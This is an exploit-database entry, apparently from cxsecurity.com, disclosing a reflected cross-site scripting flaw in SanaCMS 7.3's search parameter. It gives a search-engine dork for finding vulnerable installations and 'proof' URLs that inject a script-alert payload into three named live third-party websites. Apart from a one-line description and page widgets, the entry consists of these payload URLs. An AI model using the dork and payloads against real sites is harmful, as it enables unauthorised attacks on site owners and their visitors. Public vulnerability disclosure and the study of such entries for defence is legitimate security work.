SANADATA | SanaCMS 7.3 Cross Site Scripting

2017.02.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*=============================================================| |A Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting | |A Exploit Author: Hosein Askari | |A Vendor HomePage: https://www.sanadata.com/| | |A Version : 7.3 | |A Dork : intext:"SANADATA | SanaCMS 7.3" | |A Tested on:Parrot OS | |A Date: 3 /2 / 2017 | |Gategory: WebApplication *=============================================================| |Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search= *===========================| | Proof : | |http://www.corianco.com/fa/index.asp?p=search&search=<script>alert("xss")</script> |http://www.esmhome.com/en/index.asp?p=search&search=<script>alert("xss")</script> http://www.goldstarlogistics.org/fa/index.asp?p=search&search=<script>alert("xss")</script> *===========================| | Vulnerability description |This CMS has a Cross Site Scripting Vulnerability *=============================================================| | Discovered By : C0NSTANTINE *=============================================================|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top